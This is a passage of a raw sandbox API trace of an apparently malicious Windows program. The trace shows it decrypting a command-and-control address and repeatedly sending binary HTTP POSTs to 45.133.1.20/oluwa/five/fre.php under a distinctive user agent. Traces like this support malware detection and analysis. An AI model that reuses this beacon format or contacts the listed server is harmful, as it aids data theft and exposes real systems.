[0212.185] recv (in: s=0x5dc, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0212.262] GetProcessHeap () returned 0x6a0000 [0212.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0212.263] GetProcessHeap () returned 0x6a0000 [0212.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0212.263] GetProcessHeap () returned 0x6a0000 [0212.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0212.265] GetProcessHeap () returned 0x6a0000 [0212.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0212.265] closesocket (s=0x5dc) returned 0 [0212.266] GetProcessHeap () returned 0x6a0000 [0212.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0212.266] GetProcessHeap () returned 0x6a0000 [0212.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.266] GetProcessHeap () returned 0x6a0000 [0212.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0212.267] GetProcessHeap () returned 0x6a0000 [0212.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0212.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xda8) returned 0x5dc [0212.270] Sleep (dwMilliseconds=0xea60) [0212.271] GetProcessHeap () returned 0x6a0000 [0212.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0212.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.283] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0212.292] GetProcessHeap () returned 0x6a0000 [0212.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c60d0 [0212.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.294] CryptImportKey (in: hProv=0x6bec18, pbData=0x6c60d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0212.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.295] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.296] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.296] GetProcessHeap () returned 0x6a0000 [0212.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c60d0 | out: hHeap=0x6a0000) returned 1 [0212.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.299] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0212.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.300] CryptDestroyKey (hKey=0x6ad020) returned 1 [0212.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.301] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0212.301] GetProcessHeap () returned 0x6a0000 [0212.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.307] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.311] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.314] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.317] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.317] GetProcessHeap () returned 0x6a0000 [0212.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0212.317] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.317] GetProcessHeap () returned 0x6a0000 [0212.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0212.318] GetProcessHeap () returned 0x6a0000 [0212.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.318] GetProcessHeap () returned 0x6a0000 [0212.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0212.318] GetProcessHeap () returned 0x6a0000 [0212.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0212.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.319] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.327] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0212.334] GetProcessHeap () returned 0x6a0000 [0212.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0212.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.335] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0212.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.336] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.337] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.337] GetProcessHeap () returned 0x6a0000 [0212.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0212.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.338] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0212.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.339] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0212.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.340] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0212.340] GetProcessHeap () returned 0x6a0000 [0212.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.341] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0212.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.342] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0212.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.343] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0212.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.345] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0212.345] GetProcessHeap () returned 0x6a0000 [0212.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0212.345] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0212.345] GetProcessHeap () returned 0x6a0000 [0212.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0212.345] socket (af=2, type=1, protocol=6) returned 0x5e0 [0212.345] connect (s=0x5e0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0212.376] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0212.376] GetProcessHeap () returned 0x6a0000 [0212.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0212.376] GetProcessHeap () returned 0x6a0000 [0212.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0212.377] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.379] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.379] GetProcessHeap () returned 0x6a0000 [0212.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0212.379] GetProcessHeap () returned 0x6a0000 [0212.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.380] GetProcessHeap () returned 0x6a0000 [0212.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0212.380] GetProcessHeap () returned 0x6a0000 [0212.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0212.381] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.382] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.382] GetProcessHeap () returned 0x6a0000 [0212.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0212.382] GetProcessHeap () returned 0x6a0000 [0212.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.383] send (s=0x5e0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0212.383] send (s=0x5e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0212.386] GetProcessHeap () returned 0x6a0000 [0212.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0212.386] recv (in: s=0x5e0, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0212.453] GetProcessHeap () returned 0x6a0000 [0212.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0212.454] GetProcessHeap () returned 0x6a0000 [0212.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0212.455] GetProcessHeap () returned 0x6a0000 [0212.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0212.455] GetProcessHeap () returned 0x6a0000 [0212.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0212.458] closesocket (s=0x5e0) returned 0 [0212.461] GetProcessHeap () returned 0x6a0000 [0212.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0212.461] GetProcessHeap () returned 0x6a0000 [0212.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.462] GetProcessHeap () returned 0x6a0000 [0212.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0212.463] GetProcessHeap () returned 0x6a0000 [0212.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0212.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5fc) returned 0x5e0 [0212.466] Sleep (dwMilliseconds=0xea60) [0212.480] GetProcessHeap () returned 0x6a0000 [0212.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0212.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.482] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.495] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0212.506] GetProcessHeap () returned 0x6a0000 [0212.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0212.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.508] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0212.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.511] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.512] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.512] GetProcessHeap () returned 0x6a0000 [0212.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0212.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.514] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0212.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.515] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0212.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.517] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0212.517] GetProcessHeap () returned 0x6a0000 [0212.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.519] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.520] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.522] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.526] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.526] GetProcessHeap () returned 0x6a0000 [0212.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0212.526] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.527] GetProcessHeap () returned 0x6a0000 [0212.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0212.527] GetProcessHeap () returned 0x6a0000 [0212.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.528] GetProcessHeap () returned 0x6a0000 [0212.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0212.528] GetProcessHeap () returned 0x6a0000 [0212.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0212.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.530] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.538] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0212.544] GetProcessHeap () returned 0x6a0000 [0212.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0212.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.547] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0212.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.548] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.550] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.550] GetProcessHeap () returned 0x6a0000 [0212.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0212.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.551] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0212.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.552] CryptDestroyKey (hKey=0x6ad520) returned 1 [0212.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.553] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0212.553] GetProcessHeap () returned 0x6a0000 [0212.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.554] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0212.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.555] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0212.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.556] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0212.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.557] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0212.557] GetProcessHeap () returned 0x6a0000 [0212.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0212.557] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0212.557] GetProcessHeap () returned 0x6a0000 [0212.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0212.557] socket (af=2, type=1, protocol=6) returned 0x5e4 [0212.557] connect (s=0x5e4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0212.582] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0212.582] GetProcessHeap () returned 0x6a0000 [0212.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0212.583] GetProcessHeap () returned 0x6a0000 [0212.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0212.584] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.585] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.585] GetProcessHeap () returned 0x6a0000 [0212.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0212.585] GetProcessHeap () returned 0x6a0000 [0212.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.586] GetProcessHeap () returned 0x6a0000 [0212.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0212.586] GetProcessHeap () returned 0x6a0000 [0212.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0212.587] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.591] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.591] GetProcessHeap () returned 0x6a0000 [0212.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0212.591] GetProcessHeap () returned 0x6a0000 [0212.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.592] send (s=0x5e4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0212.592] send (s=0x5e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0212.592] GetProcessHeap () returned 0x6a0000 [0212.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0212.592] recv (in: s=0x5e4, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0212.680] GetProcessHeap () returned 0x6a0000 [0212.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0212.681] GetProcessHeap () returned 0x6a0000 [0212.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0212.681] GetProcessHeap () returned 0x6a0000 [0212.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0212.682] GetProcessHeap () returned 0x6a0000 [0212.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0212.683] closesocket (s=0x5e4) returned 0 [0212.683] GetProcessHeap () returned 0x6a0000 [0212.683] HeapFree (in: 